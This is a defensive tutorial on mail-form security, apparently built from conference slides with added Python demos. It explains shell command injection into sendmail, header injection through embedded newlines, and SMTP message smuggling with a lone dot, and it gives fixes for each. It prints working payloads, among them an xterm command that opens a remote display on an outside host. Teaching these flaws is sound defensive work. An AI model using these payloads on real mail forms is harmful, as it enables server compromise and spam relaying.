Learn to avoid backend exploitation of mail forms, using the OWASP Top 10 as the frame: unvalidated user input, broken access control and injection flaws. Understand how mail forms work, see three concrete exploits (shell metacharacters in a sender address, control characters that inject mail headers, and a lone '.' that ends the SMTP message early), and what the backend must reject or escape.
Avoiding Backend Exploitation of Mail Forms
Max Kessler, LPIC-1
OWASP Top 10 List (2004 edition) • #1 Unvalidated input • #2 Broken access control (sort of: the form becomes an open relay) • #6 Injection flaws
How do mail forms work? • A user types in their name, e-mail address and a message. • Their data are sent to the web server in an HTTP request. • The server runs a script that formats the text for consumption by a mail server, then feeds it to the mail server, either by running sendmail with the addresses on its command line or by talking SMTP directly. Every one of those fields is attacker-controlled.
User input on the command line
Exploit 1: insert semicolon/ampersand
The command should be:
  /bin/sh /usr/sbin/sendmail -f max@example.com \
    user1@example.com
The command is, when the attacker enters "max@example.com& xterm -display 192.168.0.201:0&echo" as the sender address:
  /bin/sh /usr/sbin/sendmail -f max@example.com& \
    xterm -display 192.168.0.201:0&echo \
    user1@example.com
The script spliced the address into a string that a shell parses. Each '&' (or ';') ends one command, so the shell runs sendmail, then starts xterm with its display pointed at the attacker's X server 192.168.0.201, and the trailing "echo" turns the intended recipient into a harmless argument. The attacker now has an interactive shell on the web server with the privileges of the script.
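The following is an added example, not code from the slides: a Python stand-in for the script on this slide, with /usr/sbin/sendmail replaced by `echo` and the xterm command replaced by `echo INJECTED` so the effect is visible without a mail server or an X display. The vulnerable version builds a command string for /bin/sh exactly as the slide's script does; the hardened version passes an argv list with no shell and rejects the address up front with a deliberately strict allowlist. `ADDRESS_RE`, `is_safe_address` and the payload are assumptions of this example.

```python
import re
import subprocess

# Constructed attacker input modelled on the slide; "xterm -display ..." is
# replaced by "echo INJECTED" so the injected command leaves visible output.
PAYLOAD = "max@example.com& echo INJECTED& echo"
RECIPIENT = "user1@example.com"

# Stand-in for /usr/sbin/sendmail: echo prints its arguments, which shows
# what the mailer would have been given.
MAILER = "echo"


def run_with_shell(from_addr):
    """Vulnerable: the address is spliced into a string that /bin/sh parses."""
    cmd = f"{MAILER} -f {from_addr} {RECIPIENT}"
    out = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return out.stdout.splitlines()


def run_with_argv(from_addr):
    """Hardened: argv list, no shell, so '&' is just a byte inside one argument."""
    out = subprocess.run([MAILER, "-f", from_addr, RECIPIENT],
                         capture_output=True, text=True)
    return out.stdout.splitlines()


# Allowlist (an assumption of this example, stricter than RFC 5322): letters,
# digits and a few ASCII punctuation characters, exactly one '@'. It excludes
# whitespace, shell metacharacters, control characters and a leading '-',
# which a mailer could otherwise parse as a command-line option.
ADDRESS_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._+-]{0,63}@[A-Za-z0-9.-]{1,253}$")


def is_safe_address(addr):
    """True only for addresses the form is willing to hand to the mailer."""
    return bool(ADDRESS_RE.fullmatch(addr))


if __name__ == "__main__":
    print("shell  :", run_with_shell(PAYLOAD))   # contains a line "INJECTED"
    print("argv   :", run_with_argv(PAYLOAD))    # one line, payload printed literally
    print("allowed:", is_safe_address(PAYLOAD), is_safe_address("max@example.com"))
```

Use both defences: the argv list removes the shell from the path, and the allowlist stops an address that is syntactically odd from ever reaching the mailer. Validation alone is not enough, because a future field (subject, name) can be spliced into the same string; not using a shell alone is not enough, because recipient arguments beginning with '-' are still parsed as options by sendmail-compatible mailers.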
Replay with control characters
Exploit 2: insert control characters
E-mail address should be:
  max@example.com
E-mail address is (a newline is embedded after the address):
  max@example.com
  To: user2@example.com, user3@example.com
The script copies the address unchanged into a header line such as "From:", so everything after the embedded CR or LF becomes additional header lines. Here the attacker adds a second "To:" header (or "Cc:"/"Bcc:") and the web server delivers the message to recipients the form never intended, turning the form into a spam relay.
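The following is an added example, not code from the slides: it builds the message the way a naive script does, parses it back with Python's email package to show that the injected "To:" header is honoured, and then shows the check the script should apply, which rejects any control character in a header value. `header_value`, `recipients` and the payload are assumptions of this example.

```python
from email import message_from_string

# Constructed attacker input modelled on the slide: a newline after the
# address, followed by a header line the attacker wants the mailer to see.
PAYLOAD = "max@example.com\nTo: user2@example.com, user3@example.com"
RECIPIENT = "user1@example.com"


def build_message_vulnerable(from_addr, subject, body):
    """Vulnerable: header values are interpolated verbatim, newlines included."""
    text = f"From: {from_addr}\nTo: {RECIPIENT}\nSubject: {subject}\n\n{body}"
    return message_from_string(text)


def header_value(name, value):
    """Refuse any control character (CR, LF, NUL, ...) in a header value."""
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in value):
        raise ValueError(f"control character in {name} header")
    return value


def build_message_safe(from_addr, subject, body):
    """Hardened: every attacker-influenced header value is checked first."""
    text = (f"From: {header_value('From', from_addr)}\n"
            f"To: {RECIPIENT}\n"
            f"Subject: {header_value('Subject', subject)}\n\n{body}")
    return message_from_string(text)


def recipients(msg):
    """Every address a mailer would deliver to: all To/Cc/Bcc headers."""
    out = []
    for name in ("To", "Cc", "Bcc"):
        for value in msg.get_all(name, []):
            out.extend(a.strip() for a in value.split(","))
    return out


def is_rejected(from_addr):
    """True if the hardened builder refuses this sender address."""
    try:
        build_message_safe(from_addr, "hello", "test")
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print(recipients(build_message_vulnerable(PAYLOAD, "hello", "test")))
    print(is_rejected(PAYLOAD), is_rejected("max@example.com"))
```

Checking for control characters is the right granularity: an attacker only needs one CR or LF to start a new header, and any character below 0x20 has no business in a From or Subject line. The body does not need this check, but it needs the dot-stuffing described on the next slide.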
Starting a new message
Exploit 3: using '.' to start a new message
SMTP servers allow multiple messages to be sent through a single connection. A line containing only '.' ends the DATA of the current message; whatever the script sends after it is read as the next commands (MAIL FROM, RCPT TO, DATA), so an attacker who can put a lone '.' in the message body and then append their own lines gets a second message of their choosing sent through the same connection. The same applies when the script pipes the message to sendmail without -i (or -oi): a lone '.' ends the input. The fix is dot-stuffing as required by RFC 5321 section 4.5.2: before sending, prefix every body line that begins with '.' with an extra '.', which the receiver strips again.
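The following is an added example, not code from the slides: it models both sides of the DATA phase. `client_stream` builds what the form script writes to the SMTP socket, with or without dot-stuffing, and `server_reads_data` mimics how the receiving server consumes lines until a lone '.', returning whatever is left over as the lines it would parse as new commands. The attacker body and the function names are assumptions of this example.

```python
# Constructed attacker body modelled on the slide: a lone "." ends the
# message, and the lines after it are meant to be read as SMTP commands
# that inject a second message.
PAYLOAD_BODY = ("Hello\r\n"
                ".\r\n"
                "MAIL FROM:<spammer@example.net>\r\n"
                "RCPT TO:<victim@example.org>\r\n"
                "DATA\r\n"
                "Buy now\r\n")


def dot_stuff(body):
    """RFC 5321 section 4.5.2: prefix every line starting with '.' by another '.'."""
    lines = body.split("\r\n")
    return "\r\n".join("." + line if line.startswith(".") else line for line in lines)


def client_stream(body, stuff):
    """What the form script writes after the DATA command: the body, then the
    terminator line. Without stuff=True this is the vulnerable behaviour."""
    return (dot_stuff(body) if stuff else body) + ".\r\n"


def server_reads_data(stream):
    """Model of the receiving server: consume lines up to the first lone '.',
    un-stuffing leading dots. Returns (message_lines, leftover_lines); the
    leftover is what the server would go on to parse as SMTP commands."""
    lines = stream.split("\r\n")
    message = []
    for i, line in enumerate(lines):
        if line == ".":
            return message, [rest for rest in lines[i + 1:] if rest]
        message.append(line[1:] if line.startswith(".") else line)
    return message, []  # no terminator: a real server keeps waiting


if __name__ == "__main__":
    msg, rest = server_reads_data(client_stream(PAYLOAD_BODY, stuff=False))
    print("unstuffed -> message:", msg, "then commands:", rest)
    msg, rest = server_reads_data(client_stream(PAYLOAD_BODY, stuff=True))
    print("stuffed   -> message:", msg, "then commands:", rest)
```

In practice you rarely write the DATA phase yourself: Python's smtplib performs the stuffing inside `SMTP.data()`, and a sendmail pipe should be opened with `-i` so a lone dot is treated as body text. The model above is still useful for reviewing a script that builds the SMTP conversation by hand, which is exactly the kind of script this slide is about.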